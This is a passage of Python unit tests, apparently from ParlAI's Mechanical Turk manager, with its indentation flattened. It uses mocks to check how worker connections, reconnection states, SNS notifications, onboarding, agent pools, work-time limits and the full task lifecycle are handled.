def test_socket_setup(self):
"""
Basic socket setup should fail when not in correct state, but succeed otherwise.
"""
self.mturk_manager.task_state = self.mturk_manager.STATE_CREATED
with self.assertRaises(AssertionError):
self.mturk_manager._setup_socket()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_INIT_RUN
self.mturk_manager._setup_socket()
self.assertIsInstance(self.mturk_manager.socket_manager, SocketManager)
def test_worker_alive(self):
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._onboard_new_agent = mock.MagicMock()
manager.socket_manager.open_channel = mock.MagicMock(
wraps=manager.socket_manager.open_channel
)
manager.worker_manager.worker_alive = mock.MagicMock(
wraps=manager.worker_manager.worker_alive
)
open_channel = manager.socket_manager.open_channel
worker_alive = manager.worker_manager.worker_alive
# Test no assignment
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': None,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
open_channel.assert_not_called()
worker_alive.assert_not_called()
manager._onboard_new_agent.assert_not_called()
# Test not accepting workers
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager.accepting_workers = False
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
worker_state = manager.worker_manager._get_worker(TEST_WORKER_ID_1)
self.assertIsNotNone(worker_state)
open_channel.reset_mock()
worker_alive.reset_mock()
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test successful creation
manager.accepting_workers = True
manager._on_alive(alive_packet)
open_channel.assert_called_once_with(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
worker_alive.assert_called_once_with(TEST_WORKER_ID_1)
manager._onboard_new_agent.assert_called_once()
manager._onboard_new_agent.reset_mock()
manager.force_expire_hit.assert_not_called()
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
# Reconnect in various conditions
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._add_agent_to_pool = mock.MagicMock()
# Reconnect when none state no connection_id
agent.log_reconnect = mock.MagicMock(wraps=agent.log_reconnect)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state onboarding conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'o_1234',
},
'',
)
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_ONBOARDING)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in None state waiting conversation_id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with waiting conversation id
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
agent.set_status.assert_called_once_with(AssignState.STATUS_WAITING)
manager._add_agent_to_pool.assert_called_once_with(agent)
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding with no conversation id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in onboarding but not accepting new workers
manager.accepting_workers = False
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager.force_expire_hit.reset_mock()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting no conv id
manager.accepting_workers = True
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with conv id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 'w_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_called_once()
manager._add_agent_to_pool.reset_mock()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Reconnect in waiting with task id
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': 't_1234',
},
'',
)
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
manager._restore_agent_state = mock.MagicMock()
manager._on_alive(alive_packet)
manager.force_expire_hit.assert_not_called()
manager._restore_agent_state.assert_not_called()
agent.set_status.assert_called_with(AssignState.STATUS_IN_TASK)
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test active convos failure
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
manager.opt['allowed_conversations'] = 1
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test uniqueness failed
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
manager.is_unique = True
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager.force_expire_hit.assert_called_once()
manager._onboard_new_agent.assert_not_called()
manager.force_expire_hit.reset_mock()
# Test in task reconnects
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
manager._restore_agent_state.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
agent.log_reconnect.assert_called_once()
agent.log_reconnect.reset_mock()
# Test all final states
for use_state in [
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_DONE,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
AssignState.STATUS_PARTNER_DISCONNECT,
]:
manager.send_command = mock.MagicMock()
agent.set_status(use_state)
agent.set_status.reset_mock()
manager._on_alive(alive_packet)
agent.set_status.assert_not_called()
manager._add_agent_to_pool.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.send_command.assert_called_once()
def test_mturk_messages(self):
"""
Ensure incoming messages work as expected.
"""
# Setup for test
manager = self.mturk_manager
manager.task_group_id = 'TEST_GROUP_ID'
manager.server_url = 'https://127.0.0.1'
manager.task_state = manager.STATE_ACCEPTING_WORKERS
manager._setup_socket()
manager.force_expire_hit = mock.MagicMock()
manager._on_socket_dead = mock.MagicMock()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
manager._on_alive(alive_packet)
agent = manager.worker_manager.get_agent_for_assignment(TEST_ASSIGNMENT_ID_1)
self.assertIsInstance(agent, MTurkAgent)
self.assertEqual(agent.get_status(), AssignState.STATUS_NONE)
agent.set_hit_is_abandoned = mock.MagicMock()
# Test SNS_ASSIGN_ABANDONDED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_ABANDONDED},
'',
)
manager._handle_mturk_message(message_packet)
agent.set_hit_is_abandoned.assert_called_once()
agent.set_hit_is_abandoned.reset_mock()
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._on_socket_dead.reset_mock()
# Test SNS_ASSIGN_RETURNED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_RETURNED},
'',
)
agent.hit_is_returned = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
manager._on_socket_dead.reset_mock()
self.assertTrue(agent.hit_is_returned)
# Test SNS_ASSIGN_SUBMITTED
message_packet = Packet(
'',
'',
'',
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
agent.hit_is_complete = False
manager._handle_mturk_message(message_packet)
manager._on_socket_dead.assert_not_called()
self.assertTrue(agent.hit_is_complete)
def test_new_message(self):
"""
test on_new_message.
"""
alive_packet = Packet(
'',
TEST_WORKER_ID_1,
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
message_packet = Packet(
'',
'',
MTurkManagerFile.AMAZON_SNS_NAME,
'',
TEST_ASSIGNMENT_ID_1,
{'text': MTurkManagerFile.SNS_ASSIGN_SUBMITTED},
'',
)
manager = self.mturk_manager
manager._handle_mturk_message = mock.MagicMock()
manager.worker_manager.route_packet = mock.MagicMock()
# test mturk message
manager._on_new_message(alive_packet)
manager._handle_mturk_message.assert_not_called()
manager.worker_manager.route_packet.assert_called_once_with(alive_packet)
manager.worker_manager.route_packet.reset_mock()
# test non-mturk message
manager._on_new_message(message_packet)
manager._handle_mturk_message.assert_called_once_with(message_packet)
manager.worker_manager.route_packet.assert_not_called()
@testing_utils.retry()
def test_onboarding_function(self):
manager = self.mturk_manager
manager.onboard_function = mock.MagicMock()
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager._move_agents_to_waiting = mock.MagicMock()
manager.worker_manager.get_agent_for_assignment = mock.MagicMock(
return_value=self.agent_1
)
onboard_threads = manager.assignment_to_onboard_thread
did_launch = manager._onboard_new_agent(self.agent_1)
assert_equal_by(onboard_threads[self.agent_1.assignment_id].isAlive, True, 0.2)
time.sleep(0.1)
manager.worker_manager.change_agent_conversation.assert_called_once()
manager.worker_manager.change_agent_conversation.reset_mock()
manager.onboard_function.assert_not_called()
self.assertTrue(did_launch)
# Thread will be waiting for agent_1 status to go to ONBOARDING, ensure
# won't start new thread on a repeat call when first still alive
did_launch = manager._onboard_new_agent(self.agent_1)
time.sleep(0.2)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.worker_manager.get_agent_for_assignment.assert_not_called()
manager.onboard_function.assert_not_called()
self.assertFalse(did_launch)
# Advance the worker to simulate a connection, assert onboarding goes
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
assert_equal_by(onboard_threads[self.agent_1.assignment_id].isAlive, False, 0.6)
manager.onboard_function.assert_called_with(self.agent_1)
manager._move_agents_to_waiting.assert_called_once()
# Try to launch a new onboarding world for the same agent still in
# onboarding, assert that this call is ignored.
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertFalse(did_launch)
# Try to launch with an agent that was in none but supposedly launched
# before
self.agent_1.set_status(AssignState.STATUS_NONE)
did_launch = manager._onboard_new_agent(self.agent_1)
self.assertTrue(did_launch)
self.agent_1.set_status(AssignState.STATUS_ONBOARDING)
def test_agents_incomplete(self):
agents = [self.agent_1, self.agent_2, self.agent_3]
manager = self.mturk_manager
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_2.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_1.set_status(AssignState.STATUS_DONE)
self.assertFalse(manager._no_agents_incomplete(agents))
self.agent_3.set_status(AssignState.STATUS_DONE)
self.assertTrue(manager._no_agents_incomplete(agents))
def test_world_types(self):
onboard_type = 'o_12345'
waiting_type = 'w_12345'
task_type = 't_12345'
garbage_type = 'g_12345'
manager = self.mturk_manager
self.assertTrue(manager.is_onboarding_world(onboard_type))
self.assertTrue(manager.is_task_world(task_type))
self.assertTrue(manager.is_waiting_world(waiting_type))
for world_type in [waiting_type, task_type, garbage_type]:
self.assertFalse(manager.is_onboarding_world(world_type))
for world_type in [onboard_type, task_type, garbage_type]:
self.assertFalse(manager.is_waiting_world(world_type))
for world_type in [waiting_type, onboard_type, garbage_type]:
self.assertFalse(manager.is_task_world(world_type))
def test_turk_timeout(self):
"""
Timeout should send expiration message to worker and be treated as a disconnect
event.
"""
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
manager._handle_agent_disconnect = mock.MagicMock()
manager.handle_turker_timeout(TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1)
manager.force_expire_hit.assert_called_once()
call_args = manager.force_expire_hit.call_args
self.assertEqual(call_args[0][0], TEST_WORKER_ID_1)
self.assertEqual(call_args[0][1], TEST_ASSIGNMENT_ID_1)
manager._handle_agent_disconnect.assert_called_once_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1
)
@testing_utils.retry()
def test_wait_for_task_expirations(self):
"""
Ensure waiting for expiration time actually works out.
"""
manager = self.mturk_manager
manager.opt['assignment_duration_in_seconds'] = 0.5
manager.expire_all_unassigned_hits = mock.MagicMock()
manager.hit_id_list = [1, 2, 3]
def run_task_wait():
manager._wait_for_task_expirations()
wait_thread = threading.Thread(target=run_task_wait, daemon=True)
wait_thread.start()
time.sleep(0.1)
self.assertTrue(wait_thread.isAlive())
assert_equal_by(wait_thread.isAlive, False, 0.6)
def test_mark_workers_done(self):
manager = self.mturk_manager
manager.give_worker_qualification = mock.MagicMock()
manager._log_working_time = mock.MagicMock()
manager.has_time_limit = False
# Assert finality doesn't change
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
manager.mark_workers_done([self.agent_1])
self.assertEqual(AssignState.STATUS_DISCONNECT, self.agent_1.get_status())
# assert uniqueness works as expected
manager.is_unique = True
with self.assertRaises(AssertionError):
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_not_called()
manager.unique_qual_name = 'fake_qual_name'
manager.mark_workers_done([self.agent_2])
manager.give_worker_qualification.assert_called_once_with(
self.agent_2.worker_id, 'fake_qual_name'
)
self.assertEqual(self.agent_2.get_status(), AssignState.STATUS_DONE)
manager.is_unique = False
# Ensure working time is called if it's set
manager.has_time_limit = True
manager.mark_workers_done([self.agent_3])
self.assertEqual(self.agent_3.get_status(), AssignState.STATUS_DONE)
manager._log_working_time.assert_called_once_with(self.agent_3)
class TestMTurkManagerPoolHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_pool_add_get_remove_and_expire(self):
"""
Ensure the pool properly adds and releases workers.
"""
all_are_eligible = {'multiple': True, 'func': lambda workers: workers}
manager = self.mturk_manager
# Test empty pool
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test pool add and get
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
manager._add_agent_to_pool(self.agent_3)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test extra add to pool has no effect
manager._add_agent_to_pool(self.agent_1)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible),
[self.agent_1, self.agent_2, self.agent_3],
)
# Test remove from the pool works:
manager._remove_from_agent_pool(self.agent_2)
self.assertListEqual(
manager._get_unique_pool(all_are_eligible), [self.agent_1, self.agent_3]
)
# Test repeated remove fails
with self.assertRaises(AssertionError):
manager._remove_from_agent_pool(self.agent_2)
# Test eligibility function
second_worker_only = {'multiple': True, 'func': lambda workers: [workers[1]]}
self.assertListEqual(
manager._get_unique_pool(second_worker_only), [self.agent_3]
)
# Test single eligibility function
only_agent_1 = {
'multiple': False,
'func': lambda worker: worker is self.agent_1,
}
self.assertListEqual(manager._get_unique_pool(only_agent_1), [self.agent_1])
# Test expiration of pool
manager.force_expire_hit = mock.MagicMock()
manager._expire_agent_pool()
manager.force_expire_hit.assert_any_call(
self.agent_1.worker_id, self.agent_1.assignment_id
)
manager.force_expire_hit.assert_any_call(
self.agent_3.worker_id, self.agent_3.assignment_id
)
pool = manager._get_unique_pool(all_are_eligible)
self.assertEqual(pool, [])
# Test adding two agents from the same worker
self.agent_2.worker_id = self.agent_1.worker_id
manager._add_agent_to_pool(self.agent_1)
manager._add_agent_to_pool(self.agent_2)
# both workers are in the pool
self.assertListEqual(manager.agent_pool, [self.agent_1, self.agent_2])
# Only one worker per unique list though
manager.is_sandbox = False
self.assertListEqual(manager._get_unique_pool(all_are_eligible), [self.agent_1])
class TestMTurkManagerTimeHandling(unittest.TestCase):
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager.time_limit_checked = time.time()
self.mturk_manager.worker_manager.un_time_block_workers = mock.MagicMock()
self.mturk_manager.worker_manager.time_block_worker = mock.MagicMock()
self.old_time = MTurkManagerFile.time
MTurkManagerFile.time = mock.MagicMock()
MTurkManagerFile.time.time = mock.MagicMock(return_value=0)
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
def tearDown(self):
self.mturk_manager.shutdown()
MTurkManagerFile.time = self.old_time
def test_create_work_time_file(self):
manager = self.mturk_manager
manager._should_use_time_logs = mock.MagicMock(return_value=True)
file_path = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, MTurkManagerFile.TIME_LOGS_FILE_LOCK)
# No lock should exist already
self.assertFalse(os.path.exists(file_lock))
# open the work time file, ensure it was just updated
MTurkManagerFile.time.time = mock.MagicMock(return_value=42424242)
manager._reset_time_logs(force=True)
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
self.assertEqual(existing_times['last_reset'], 42424242)
self.assertEqual(len(existing_times), 1)
# Try to induce a check, ensure it doesn't fire because too recent
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Try to induce a check, ensure it doesn't fire because outside of 30
# minute window
MTurkManagerFile.time.time = mock.MagicMock(
return_value=(60 * 60 * 24 * 1000) + (60 * 40)
)
manager.time_limit_checked = 0
manager._check_time_limit()
manager.worker_manager.un_time_block_workers.assert_not_called()
# Induce a check
MTurkManagerFile.time.time = mock.MagicMock(return_value=(60 * 60 * 24 * 1000))
manager._check_time_limit()
self.assertEqual(manager.time_limit_checked, (60 * 60 * 24 * 1000))
def test_add_to_work_time_file_and_block(self):
manager = self.mturk_manager
self.agent_1.creation_time = 1000
self.agent_2.creation_time = 1000
manager.opt['max_time'] = 10000
# Ensure a worker below the time limit isn't blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=10000)
self.mturk_manager._should_use_time_logs = mock.MagicMock(return_value=True)
manager._log_working_time(self.agent_1)
manager.worker_manager.time_block_worker.assert_not_called()
# Ensure a worker above the time limit is blocked
MTurkManagerFile.time.time = mock.MagicMock(return_value=100000)
manager._log_working_time(self.agent_2)
manager.worker_manager.time_block_worker.assert_called_with(
self.agent_2.worker_id
)
# Ensure on a (forced) reset all workers are freed
manager._reset_time_logs(force=True)
manager.worker_manager.un_time_block_workers.assert_called_once()
args = manager.worker_manager.un_time_block_workers.call_args
worker_list = args[0][0]
self.assertIn(self.agent_1.worker_id, worker_list)
self.assertIn(self.agent_2.worker_id, worker_list)
class TestMTurkManagerLifecycleFunctions(unittest.TestCase):
def setUp(self):
self.fake_socket = MockSocket()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['task_description'] = 'Test task description'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
MTurkManagerFile.server_utils.delete_server = mock.MagicMock()
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
@testing_utils.retry()
def test_full_lifecycle(self):
manager = self.mturk_manager
server_url = 'https://fake_server_url'
topic_arn = 'aws_topic_arn'
mturk_page_url = 'https://test_mturk_page_url'
MTurkManagerFile.server_utils.setup_server = mock.MagicMock(
return_value=server_url
)
MTurkManagerFile.server_utils.setup_legacy_server = mock.MagicMock(
return_value=server_url
)
# Currently in state created. Try steps that are too soon to work
with self.assertRaises(AssertionError):
manager.start_new_run()
with self.assertRaises(AssertionError):
manager.start_task(None, None, None)
# Setup the server but fail due to insufficent funds
manager.opt['local'] = True
MTurkManagerFile.input = mock.MagicMock()
MTurkManagerFile.mturk_utils.setup_aws_credentials = mock.MagicMock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=False
)
MTurkManagerFile.mturk_utils.calculate_mturk_cost = mock.MagicMock(
return_value=10
)
with self.assertRaises(SystemExit):
manager.setup_server()
MTurkManagerFile.mturk_utils.setup_aws_credentials.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.input.assert_called()
# Two calls to to input if local is set
self.assertEqual(len(MTurkManagerFile.input.call_args_list), 2)
# Test successful setup
manager.opt['local'] = False
MTurkManagerFile.input.reset_mock()
MTurkManagerFile.mturk_utils.check_mturk_balance = mock.MagicMock(
return_value=True
)
MTurkManagerFile.mturk_utils.create_hit_config = mock.MagicMock()
manager.setup_server()
# Copy one file for cover page, 2 workers, and 1 onboarding
self.assertEqual(len(manager.task_files_to_copy), 4)
self.assertEqual(manager.server_url, server_url)
self.assertIn('unittest', manager.server_task_name)
MTurkManagerFile.input.assert_called_once()
MTurkManagerFile.mturk_utils.check_mturk_balance.assert_called_once()
MTurkManagerFile.mturk_utils.create_hit_config.assert_called_once()
self.assertEqual(manager.task_state, manager.STATE_SERVER_ALIVE)
# Start a new run
MTurkManagerFile.mturk_utils.setup_sns_topic = mock.MagicMock(
return_value=topic_arn
)
manager._init_state = mock.MagicMock(wraps=manager._init_state)
manager.start_new_run()
manager._init_state.assert_called_once()
MTurkManagerFile.mturk_utils.setup_sns_topic.assert_called_once_with(
manager.opt['task'], manager.server_url, manager.task_group_id
)
self.assertEqual(manager.topic_arn, topic_arn)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
# connect to the server
manager._setup_socket = mock.MagicMock()
manager.ready_to_accept_workers()
manager._setup_socket.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_ACCEPTING_WORKERS)
# 'launch' some hits
manager.create_additional_hits = mock.MagicMock(return_value=mturk_page_url)
hits_url = manager.create_hits()
manager.create_additional_hits.assert_called_once()
self.assertEqual(manager.task_state, MTurkManager.STATE_HITS_MADE)
self.assertEqual(hits_url, mturk_page_url)
# start a task
manager.num_conversations = 10
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
# Run a task, ensure it closes when the max convs have been 'had'
def run_task():
manager.start_task(lambda worker: True, None, None)
task_thread = threading.Thread(target=run_task, daemon=True)
task_thread.start()
self.assertTrue(task_thread.isAlive())
manager.started_conversations = 10
manager.completed_conversations = 10
assert_equal_by(task_thread.isAlive, False, 0.6)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
# shutdown
manager.expire_all_unassigned_hits = mock.MagicMock()
manager._expire_onboarding_pool = mock.MagicMock()
manager._expire_agent_pool = mock.MagicMock()
manager._wait_for_task_expirations = mock.MagicMock()
MTurkManagerFile.mturk_utils.delete_sns_topic = mock.MagicMock()
manager.shutdown()
self.assertTrue(manager.is_shutdown)
manager.expire_all_unassigned_hits.assert_called_once()
manager._expire_onboarding_pool.assert_called_once()
manager._expire_agent_pool.assert_called_once()
manager._wait_for_task_expirations.assert_called_once()
MTurkManagerFile.server_utils.delete_server.assert_called_once()
MTurkManagerFile.mturk_utils.delete_sns_topic.assert_called_once_with(topic_arn)
class TestMTurkManagerConnectedFunctions(unittest.TestCase):
"""
Semi-unit semi-integration tests on the more state-dependent MTurkManager
functionality.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
